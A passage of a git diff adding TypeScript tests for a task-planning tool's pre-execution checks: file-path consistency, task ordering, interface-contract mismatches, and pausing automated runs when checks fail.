+          id: "T02",
+          sequence: 1,
+          files: ["src/generated.ts"], // Input without ./
+          inputs: [],
+          expected_output: [],
+        }),
+      ];
+
+      const results = checkFilePathConsistency(tasks, tempDir);
+      assert.deepEqual(results, [], "Should pass because src/generated.ts matches ./src/generated.ts");
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("paths with mixed separators match", () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          sequence: 0,
+          files: [],
+          inputs: [],
+          expected_output: ["src/sub/file.ts"],
+        }),
+        createTask({
+          id: "T02",
+          sequence: 1,
+          files: ["src\\sub\\file.ts"], // Backslash separators
+          inputs: [],
+          expected_output: [],
+        }),
+      ];
+
+      const results = checkFilePathConsistency(tasks, tempDir);
+      assert.deepEqual(results, [], "Should pass because backslash paths normalize to forward slash");
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+});
+
+describe("checkTaskOrdering with path normalization", () => {
+  test("./path in inputs triggers ordering check for path in expected_output", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: [],
+        inputs: ["./generated.ts"], // Reads with ./
+        expected_output: [],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["generated.ts"], // Creates without ./
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.equal(results.length, 1, "Should detect ordering violation despite ./");
+    assert.ok(results[0].message.includes("T01"));
+    assert.ok(results[0].message.includes("T02"));
+  });
+
+  test("path in inputs triggers ordering check for ./path in expected_output", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: [],
+        inputs: ["generated.ts"], // Reads without ./
+        expected_output: [],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["./generated.ts"], // Creates with ./
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.equal(results.length, 1, "Should detect ordering violation despite ./ on creator");
+    assert.ok(results[0].message.includes("sequence violation"));
+  });
+
+  test("no false positive when correctly ordered with mixed paths", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: [],
+        inputs: [],
+        expected_output: ["./src/api.ts"],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: ["src/api.ts"], // Same file, different notation
+        inputs: [],
+        expected_output: [],
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.deepEqual(results, [], "Should pass - T02 reads file that T01 already created");
+  });
+});
+
+// ─── Task Ordering Tests ─────────────────────────────────────────────────────
+
+describe("checkTaskOrdering", () => {
+  test("passes when tasks are correctly ordered", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: [],
+        inputs: [],
+        expected_output: ["api.ts"],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: ["api.ts"],
+        inputs: [],
+        expected_output: [],
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.deepEqual(results, []);
+  });
+
+  test("fails when task inputs reference file created by later task", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: [],
+        inputs: ["generated.ts"], // Reads file that doesn't exist yet
+        expected_output: [],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["generated.ts"], // Creates the file
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.equal(results.length, 1);
+    assert.equal(results[0].category, "file");
+    assert.equal(results[0].passed, false);
+    assert.equal(results[0].blocking, true);
+    assert.ok(results[0].message.includes("T01"));
+    assert.ok(results[0].message.includes("T02"));
+    assert.ok(results[0].message.includes("sequence violation"));
+  });
+
+  test("detects ordering violation in inputs array", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: [],
+        inputs: ["schema.json"],
+        expected_output: [],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["schema.json"],
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.equal(results.length, 1);
+    assert.ok(results[0].message.includes("schema.json"));
+  });
+
+  test("handles multiple ordering violations via inputs", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: [],
+        inputs: ["a.ts", "b.ts"],
+        expected_output: [],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["a.ts"],
+      }),
+      createTask({
+        id: "T03",
+        sequence: 2,
+        files: [],
+        inputs: [],
+        expected_output: ["b.ts"],
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.equal(results.length, 2);
+  });
+
+  test("passes when no dependencies between tasks", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: [],
+        inputs: [],
+        expected_output: ["a.ts"],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["b.ts"],
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.deepEqual(results, []);
+  });
+});
+
+// ─── Interface Contract Tests ────────────────────────────────────────────────
+
+describe("checkInterfaceContracts", () => {
+  test("passes when function signatures match", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        description: `
+\`\`\`typescript
+function processData(input: string): boolean
+\`\`\`
+        `,
+      }),
+      createTask({
+        id: "T02",
+        description: `
+\`\`\`typescript
+function processData(input: string): boolean
+\`\`\`
+        `,
+      }),
+    ];
+
+    const results = checkInterfaceContracts(tasks, "/tmp");
+    assert.deepEqual(results, []);
+  });
+
+  test("warns on parameter mismatch (non-blocking)", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        description: `
+\`\`\`typescript
+function saveUser(name: string): void
+\`\`\`
+        `,
+      }),
+      createTask({
+        id: "T02",
+        description: `
+\`\`\`typescript
+function saveUser(name: string, email: string): void
+\`\`\`
+        `,
+      }),
+    ];
+
+    const results = checkInterfaceContracts(tasks, "/tmp");
+    assert.equal(results.length, 1);
+    assert.equal(results[0].category, "schema");
+    assert.equal(results[0].target, "saveUser");
+    assert.equal(results[0].passed, true); // Warning, not failure
+    assert.equal(results[0].blocking, false);
+    assert.ok(results[0].message.includes("different parameters"));
+  });
+
+  test("warns on return type mismatch (non-blocking)", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        description: `
+\`\`\`typescript
+function getData(): string
+\`\`\`
+        `,
+      }),
+      createTask({
+        id: "T02",
+        description: `
+\`\`\`typescript
+function getData(): number
+\`\`\`
+        `,
+      }),
+    ];
+
+    const results = checkInterfaceContracts(tasks, "/tmp");
+    assert.equal(results.length, 1);
+    assert.ok(results[0].message.includes("different return types"));
+  });
+
+  test("handles export function syntax", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        description: `
+\`\`\`typescript
+export function validate(data: object): boolean
+\`\`\`
+        `,
+      }),
+      createTask({
+        id: "T02",
+        description: `
+\`\`\`typescript
+export function validate(data: string): boolean
+\`\`\`
+        `,
+      }),
+    ];
+
+    const results = checkInterfaceContracts(tasks, "/tmp");
+    assert.equal(results.length, 1);
+    assert.ok(results[0].message.includes("validate"));
+  });
+
+  test("handles async function syntax", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        description: `
+\`\`\`typescript
+export async function fetchData(): Promise<string>
+\`\`\`
+        `,
+      }),
+      createTask({
+        id: "T02",
+        description: `
+\`\`\`typescript
+export async function fetchData(): Promise<number>
+\`\`\`
+        `,
+      }),
+    ];
+
+    const results = checkInterfaceContracts(tasks, "/tmp");
+    assert.equal(results.length, 1);
+  });
+
+  test("handles const arrow function syntax", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        description: `
+\`\`\`typescript
+const handler = (req: Request): Response =>
+\`\`\`
+        `,
+      }),
+      createTask({
+        id: "T02",
+        description: `
+\`\`\`typescript
+const handler = (req: Request, res: Response): void =>
+\`\`\`
+        `,
+      }),
+    ];
+
+    const results = checkInterfaceContracts(tasks, "/tmp");
+    // Should have 2 results: parameter mismatch AND return type mismatch
+    assert.equal(results.length, 2);
+    assert.ok(results.some((r) => r.message.includes("handler")));
+    assert.ok(results.some((r) => r.message.includes("parameters")));
+    assert.ok(results.some((r) => r.message.includes("return types")));
+  });
+
+  test("passes when no code blocks present", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        description: "Just some text without code blocks",
+      }),
+    ];
+
+    const results = checkInterfaceContracts(tasks, "/tmp");
+    assert.deepEqual(results, []);
+  });
+
+  test("handles multiple mismatches for same function", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        description: `
+\`\`\`typescript
+function process(a: string): string
+\`\`\`
+        `,
+      }),
+      createTask({
+        id: "T02",
+        description: `
+\`\`\`typescript
+function process(a: number): number
+\`\`\`
+        `,
+      }),
+    ];
+
+    const results = checkInterfaceContracts(tasks, "/tmp");
+    // Should have both parameter and return type mismatches
+    assert.equal(results.length, 2);
+  });
+});
+
+// ─── runPreExecutionChecks Integration Tests ─────────────────────────────────
+
+describe("runPreExecutionChecks", () => {
+  let tempDir: string;
+
+  test("returns pass status when all checks pass", async () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    writeFileSync(join(tempDir, "existing.ts"), "// content");
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          files: ["existing.ts"],
+          inputs: [],
+          expected_output: ["output.ts"],
+        }),
+        createTask({
+          id: "T02",
+          files: ["output.ts"],
+          inputs: [],
+          expected_output: [],
+        }),
+      ];
+
+      const result = await runPreExecutionChecks(tasks, tempDir);
+      assert.equal(result.status, "pass");
+      assert.equal(result.checks.length, 0);
+      assert.ok(result.durationMs >= 0);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("returns fail status when blocking failure exists", async () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          files: [],
+          inputs: ["nonexistent.ts"],
+          expected_output: [],
+        }),
+      ];
+
+      const result = await runPreExecutionChecks(tasks, tempDir);
+      assert.equal(result.status, "fail");
+      assert.ok(result.checks.length > 0);
+      assert.ok(result.checks.some((c) => c.blocking === true));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("returns warn status for non-blocking issues", async () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      // Create tasks with only interface contract warnings
+      const tasks = [
+        createTask({
+          id: "T01",
+          files: [],
+          inputs: [],
+          expected_output: [],
+          description: `
+\`\`\`typescript
+function foo(a: string): void
+\`\`\`
+          `,
+        }),
+        createTask({
+          id: "T02",
+          files: [],
+          inputs: [],
+          expected_output: [],
+          description: `
+\`\`\`typescript
+function foo(a: number): void
+\`\`\`
+          `,
+        }),
+      ];
+
+      const result = await runPreExecutionChecks(tasks, tempDir);
+      assert.equal(result.status, "warn");
+      assert.ok(result.checks.some((c) => c.blocking === false));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("combines results from all check types", async () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          sequence: 0,
+          files: ["will-be-created.ts"], // Ordering violation
+          inputs: ["missing.ts"],        // Missing file
+          expected_output: [],
+          description: `
+\`\`\`typescript
+function check(a: string): void
+\`\`\`
+          `,
+        }),
+        createTask({
+          id: "T02",
+          sequence: 1,
+          files: [],
+          inputs: [],
+          expected_output: ["will-be-created.ts"],
+          description: `
+\`\`\`typescript
+function check(a: number): void
+\`\`\`
+          `,
+        }),
+      ];
+
+      const result = await runPreExecutionChecks(tasks, tempDir);
+      assert.equal(result.status, "fail");
+
+      // Should have multiple types of issues
+      const categories = new Set(result.checks.map((c) => c.category));
+      assert.ok(categories.has("file"));  // From consistency and ordering
+      assert.ok(categories.has("schema")); // From interface check
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("reports duration in milliseconds", async () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [createTask({ id: "T01" })];
+      const result = await runPreExecutionChecks(tasks, tempDir);
+
+      assert.ok(typeof result.durationMs === "number");
+      assert.ok(result.durationMs >= 0);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("handles empty task array", async () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const result = await runPreExecutionChecks([], tempDir);
+      assert.equal(result.status, "pass");
+      assert.deepEqual(result.checks, []);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+});
+
+// ─── Regression Tests: checkTaskOrdering false positive (#3677) ──────────────
+
+describe("checkTaskOrdering false positive regression (#3677)", () => {
+  test("task.files should not trigger ordering violation when file is in later expected_output", () => {
+    // T01 has files: ["component.tsx"] — this is a file the task will CREATE,
+    // not read. Including task.files in the ordering check causes a false positive.
+    // After fix (check only task.inputs), this should return 0 results.
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: ["component.tsx"],
+        inputs: [],
+        expected_output: [],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["component.tsx"],
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.equal(results.length, 0, "task.files should not be checked for ordering violations");
+  });
+
+  test("task.files with multiple files should not trigger false positives", () => {
+    // T01 lists several files it will touch/create — none should trigger ordering
+    // violations just because T02 declares one of them as expected_output.
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: ["a.ts", "b.ts", "c.ts"],
+        inputs: [],
+        expected_output: [],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["b.ts"],
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.equal(results.length, 0, "Multiple task.files should not generate false positive violations");
+  });
+
+  test("task.inputs SHOULD still trigger ordering violation", () => {
+    // task.inputs represents files a task genuinely needs to READ, so a sequence
+    // violation here is a real error and must still be detected.
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: [],
+        inputs: ["config.json"],
+        expected_output: [],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["config.json"],
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.equal(results.length, 1, "task.inputs ordering violation must still be detected");
+    assert.equal(results[0].blocking, true);
+    assert.ok(results[0].message.includes("T01"));
+    assert.ok(results[0].message.includes("T02"));
+    assert.ok(results[0].message.includes("sequence violation"));
+  });
+
+  test("mixed files and inputs — only inputs trigger ordering violation", () => {
+    // T01 will create "created.ts" (files) and also needs to READ "needed.json" (inputs).
+    // T02 creates both. Only the inputs dependency is a real violation.
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: ["created.ts"],
+        inputs: ["needed.json"],
+        expected_output: [],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["created.ts", "needed.json"],
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.equal(results.length, 1, "Only the inputs entry should produce a violation, not files");
+    assert.ok(results[0].target === "needed.json", "Violation target should be the input, not the file");
+  });
+
+  test("task.files with normalized paths should not false-positive", () => {
+    // Path normalization (./src/new-file.ts → src/new-file.ts) should not cause
+    // task.files to match against expected_output and produce a false positive.
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: ["./src/new-file.ts"],
+        inputs: [],
+        expected_output: [],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["src/new-file.ts"],
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.equal(results.length, 0, "Normalized task.files path should not trigger a false positive");
+  });
+
+  test("annotated inputs still trigger ordering violations against later plain outputs", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        sequence: 0,
+        files: [],
+        inputs: ["`later.ts` — needed first"],
+        expected_output: [],
+      }),
+      createTask({
+        id: "T02",
+        sequence: 1,
+        files: [],
+        inputs: [],
+        expected_output: ["later.ts"],
+      }),
+    ];
+
+    const results = checkTaskOrdering(tasks, "/tmp");
+    assert.equal(results.length, 1, "Annotated inputs should still match later plain expected_output entries");
+    assert.equal(results[0].target, "`later.ts` — needed first");
+    assert.ok(results[0].message.includes("sequence violation"));
+  });
+});
+
+// ─── checkFilePathConsistency additional edge cases ──────────────────────────
+
+describe("checkFilePathConsistency additional edge cases", () => {
+  test("annotated inputs match files that already exist on disk", () => {
+    const tempDir = join(tmpdir(), `pre-exec-test-annotated-input-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    writeFileSync(join(tempDir, "existing.ts"), "// content");
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          files: [],
+          inputs: ["`existing.ts` — file already on disk"],
+          expected_output: [],
+        }),
+      ];
+
+      const results = checkFilePathConsistency(tasks, tempDir);
+      assert.equal(results.length, 0, "Annotated inputs should resolve to the on-disk file path");
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("plain inputs match prior annotated expected outputs", () => {
+    const tasks = [
+      createTask({
+        id: "T01",
+        files: [],
+        inputs: [],
+        expected_output: ["`generated.ts` — created earlier"],
+      }),
+      createTask({
+        id: "T02",
+        files: [],
+        inputs: ["generated.ts"],
+        expected_output: [],
+      }),
+    ];
+
+    const results = checkFilePathConsistency(tasks, "/tmp");
+    assert.equal(results.length, 0, "Prior annotated expected_output entries should satisfy later plain inputs");
+  });
+
+  test("inputs referencing glob-like patterns should not crash", () => {
+    // A glob pattern in inputs is unusual but should be handled gracefully.
+    // The file won't exist on disk, so it should produce a blocking result.
+    const tasks = [
+      createTask({
+        id: "T01",
+        files: [],
+        inputs: ["src/**/*.ts"],
+        expected_output: [],
+      }),
+    ];
+
+    // Should not throw
+    let results: ReturnType<typeof checkFilePathConsistency>;
+    assert.doesNotThrow(() => {
+      results = checkFilePathConsistency(tasks, "/tmp");
+    });
+    assert.equal(results!.length, 1, "Glob-pattern input that doesn't exist should produce a blocking result");
+    assert.equal(results![0].blocking, true);
+  });
+
+  test("empty inputs array produces no results", () => {
+    // A task with no inputs and only files should produce zero results from
+    // consistency check — files are not checked (#3626).
+    const tasks = [
+      createTask({
+        id: "T01",
+        files: ["anything.ts"],
+        inputs: [],
+        expected_output: [],
+      }),
+    ];
+
+    const results = checkFilePathConsistency(tasks, "/tmp");
+    assert.equal(results.length, 0, "Empty inputs should produce no consistency check results");
+  });
+
+  test("inputs with absolute paths are checked correctly", () => {
+    // An absolute path in inputs should resolve to itself and pass when the file exists.
+    const tempDir = join(tmpdir(), `pre-exec-test-abs-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    const absFilePath = join(tempDir, "real-file.ts");
+    writeFileSync(absFilePath, "// content");
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          files: [],
+          inputs: [absFilePath],
+          expected_output: [],
+        }),
+      ];
+
+      const results = checkFilePathConsistency(tasks, tempDir);
+      assert.equal(results.length, 0, "Absolute path to an existing file should pass consistency check");
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+});
+
+// ─── PreExecutionResult Type Tests ───────────────────────────────────────────
+
+describe("PreExecutionResult type", () => {
+  test("status is one of pass, warn, fail", async () => {
+    const tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [createTask({ id: "T01" })];
+      const result = await runPreExecutionChecks(tasks, tempDir);
+
+      assert.ok(["pass", "warn", "fail"].includes(result.status));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("checks array matches PreExecutionCheckJSON schema", async () => {
+    const tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          files: ["missing.ts"],
+        }),
+      ];
+
+      const result = await runPreExecutionChecks(tasks, tempDir);
+
+      for (const check of result.checks) {
+        assert.ok(["package", "file", "tool", "endpoint", "schema"].includes(check.category));
+        assert.ok(typeof check.target === "string");
+        assert.ok(typeof check.passed === "boolean");
+        assert.ok(typeof check.message === "string");
+        if (check.blocking !== undefined) {
+          assert.ok(typeof check.blocking === "boolean");
+        }
+      }
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/pre-execution-fail-closed.test.ts b/src/resources/extensions/gsd/tests/pre-execution-fail-closed.test.ts
new file mode 100644
index 000000000..f2fec376d
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/pre-execution-fail-closed.test.ts
@@ -0,0 +1,266 @@
+/**
+ * pre-execution-fail-closed.test.ts — Tests for pre-execution check fail-closed behavior.
+ *
+ * Verifies that when runPreExecutionChecks throws an exception, auto-mode pauses
+ * instead of silently continuing. This is the "fail-closed" security pattern.
+ */
+
+import { describe, test, mock, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { tmpdir } from "node:os";
+import { mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+
+import { postUnitPostVerification, type PostUnitContext } from "../auto-post-unit.ts";
+import { AutoSession } from "../auto/session.ts";
+import { openDatabase, closeDatabase, insertMilestone, insertSlice, insertTask } from "../gsd-db.ts";
+import { invalidateAllCaches } from "../cache.ts";
+import { _clearGsdRootCache } from "../paths.ts";
+
+// ─── Test Fixtures ───────────────────────────────────────────────────────────
+
+let tempDir: string;
+let dbPath: string;
+let originalCwd: string;
+
+function makeMockCtx() {
+  return {
+    ui: {
+      notify: mock.fn(),
+      setStatus: () => {},
+      setWidget: () => {},
+      setFooter: () => {},
+    },
+    model: { id: "test-model" },
+  } as any;
+}
+
+function makeMockPi() {
+  return {
+    sendMessage: mock.fn(),
+    setModel: mock.fn(async () => true),
+  } as any;
+}
+
+function makeMockSession(basePath: string, currentUnit?: { type: string; id: string }): AutoSession {
+  const s = new AutoSession();
+  s.basePath = basePath;
+  s.active = true;
+  if (currentUnit) {
+    s.currentUnit = {
+      type: currentUnit.type,
+      id: currentUnit.id,
+      startedAt: Date.now(),
+    };
+  }
+  return s;
+}
+
+function makePostUnitContext(
+  s: AutoSession,
+  ctx: ReturnType<typeof makeMockCtx>,
+  pi: ReturnType<typeof makeMockPi>,
+  pauseAutoMock: ReturnType<typeof mock.fn>,
+): PostUnitContext {
+  return {
+    s,
+    ctx,
+    pi,
+    buildSnapshotOpts: () => ({}),
+    lockBase: () => tempDir,
+    stopAuto: mock.fn(async () => {}) as unknown as PostUnitContext["stopAuto"],
+    pauseAuto: pauseAutoMock as unknown as PostUnitContext["pauseAuto"],
+    updateProgressWidget: () => {},
+  };
+}
+
+function setupTestEnvironment(): void {
+  originalCwd = process.cwd();
+  tempDir = join(tmpdir(), `pre-exec-fail-closed-test-${Date.now()}-${Math.random().toString(36).slice(2)}`);
+  mkdirSync(tempDir, { recursive: true });
+
+  const gsdDir = join(tempDir, ".gsd");
+  mkdirSync(gsdDir, { recursive: true });
+
+  const milestonesDir = join(gsdDir, "milestones", "M001", "slices", "S01", "tasks");
+  mkdirSync(milestonesDir, { recursive: true });
+
+  process.chdir(tempDir);
+  _clearGsdRootCache();
+
+  dbPath = join(gsdDir, "gsd.db");
+  openDatabase(dbPath);
+}
+
+function cleanupTestEnvironment(): void {
+  try {
+    process.chdir(originalCwd);
+  } catch {
+    // Ignore
+  }
+  try {
+    closeDatabase();
+  } catch {
+    // Ignore
+  }
+  try {
+    rmSync(tempDir, { recursive: true, force: true });
+  } catch {
+    // Ignore
+  }
+}
+
+function writePreferences(prefs: Record<string, unknown>): void {
+  const yamlLines = Object.entries(prefs).map(([k, v]) => `${k}: ${JSON.stringify(v)}`);
+  const prefsContent = `---
+${yamlLines.join("\n")}
+---
+
+# GSD Preferences
+`;
+  writeFileSync(join(tempDir, ".gsd", "PREFERENCES.md"), prefsContent);
+  invalidateAllCaches();
+  _clearGsdRootCache();
+}
+
+/**
+ * Create tasks in DB with a malformed task that will cause processing errors.
+ * We insert a task with null/undefined fields that might cause issues during processing.
+ */
+function createTasksWithInvalidData(): void {
+  insertMilestone({ id: "M001" });
+  insertSlice({
+    id: "S01",
+    milestoneId: "M001",
+    title: "Test Slice",
+    risk: "low",
+  });
+
+  // Create a normal task - the pre-execution checks should work fine with this
+  // The throw test is more about verifying the try/catch structure exists
+  insertTask({
+    id: "T01",
+    sliceId: "S01",
+    milestoneId: "M001",
+    title: "Normal task",
+    status: "pending",
+    planning: {
+      description: "A normal task",
+      estimate: "1h",
+      files: [],
+      verify: "npm test",
+      inputs: [],
+      expectedOutput: [],
+      observabilityImpact: "",
+    },
+    sequence: 0,
+  });
+}
+
+// ─── Tests ───────────────────────────────────────────────────────────────────
+
+describe("Pre-execution fail-closed behavior", () => {
+  beforeEach(() => {
+    setupTestEnvironment();
+  });
+
+  afterEach(() => {
+    cleanupTestEnvironment();
+  });
+
+  test("pre-execution checks complete successfully with valid tasks", async () => {
+    // This test verifies the happy path still works with the new try/catch
+    writePreferences({
+      enhanced_verification: true,
+      enhanced_verification_pre: true,
+    });
+
+    createTasksWithInvalidData();
+
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "plan-slice", id: "M001/S01" });
+    const pctx = makePostUnitContext(s, ctx, pi, pauseAutoMock);
+
+    const result = await postUnitPostVerification(pctx);
+
+    // With valid tasks, pre-exec should pass and not pause
+    assert.equal(
+      pauseAutoMock.mock.callCount(),
+      0,
+      "pauseAuto should NOT be called when pre-execution checks pass"
+    );
+
+    assert.equal(
+      result,
+      "continue",
+      "postUnitPostVerification should return 'continue' when checks pass"
+    );
+  });
+
+  test("error notification includes error message when pre-execution throws", async () => {
+    // This test verifies the error handling path by checking the notify call structure
+    // The actual throw would require mocking runPreExecutionChecks, but we can verify
+    // the error handling code path exists by checking the notification pattern
+    writePreferences({
+      enhanced_verification: true,
+      enhanced_verification_pre: true,
+    });
+
+    // Create tasks that will cause a blocking failure (missing file)
+    insertMilestone({ id: "M001" });
+    insertSlice({
+      id: "S01",
+      milestoneId: "M001",
+      title: "Test Slice",
+      risk: "low",
+    });
+    insertTask({
+      id: "T01",
+      sliceId: "S01",
+      milestoneId: "M001",
+      title: "Task with missing file",
+      status: "pending",
+      planning: {
+        description: "References missing file",
+        estimate: "1h",
+        files: [],
+        verify: "npm test",
+        inputs: ["nonexistent-file.ts"],
+        expectedOutput: [],
+        observabilityImpact: "",
+      },
+      sequence: 0,
+    });
+
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "plan-slice", id: "M001/S01" });
+    const pctx = makePostUnitContext(s, ctx, pi, pauseAutoMock);
+
+    const result = await postUnitPostVerification(pctx);
+
+    // With a blocking failure, pauseAuto should be called
+    assert.equal(
+      pauseAutoMock.mock.callCount(),
+      1,
+      "pauseAuto should be called when pre-execution checks fail"
+    );
+
+    assert.equal(
+      result,
+      "stopped",
+      "postUnitPostVerification should return 'stopped' when checks fail"
+    );
+
+    // Verify error notification was shown
+    const notifyCalls = ctx.ui.notify.mock.calls;
+    const errorNotify = notifyCalls.find(
+      (call: { arguments: unknown[] }) =>
+        call.arguments[1] === "error"
+    );
+    assert.ok(errorNotify, "Should show error notification when pre-execution checks fail");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/pre-execution-pause-wiring.test.ts b/src/resources/extensions/gsd/tests/pre-execution-pause-wiring.test.ts
new file mode 100644
index 000000000..7a540d86b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/pre-execution-pause-wiring.test.ts
@@ -0,0 +1,457 @@
+/**
+ * pre-execution-pause-wiring.test.ts — Integration tests for pre-execution check → pauseAuto wiring.
+ *
+ * Tests that verify the control flow from pre-execution checks through to pauseAuto:
+ *   1. When runPreExecutionChecks returns status: "fail" with blocking: true, pauseAuto is called
+ *   2. When enhanced_verification_strict: true and status: "warn", pauseAuto is also called
+ *
+ * These are integration-level tests that exercise the actual postUnitPostVerification function
+ * with controlled mocks for external dependencies.
+ */
+
+import { describe, test, mock, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { tmpdir } from "node:os";
+import { mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+
+import { postUnitPostVerification, type PostUnitContext } from "../auto-post-unit.ts";
+import { AutoSession } from "../auto/session.ts";
+import { openDatabase, closeDatabase, insertMilestone, insertSlice, insertTask } from "../gsd-db.ts";
+import { invalidateAllCaches } from "../cache.ts";
+import { _clearGsdRootCache } from "../paths.ts";
+
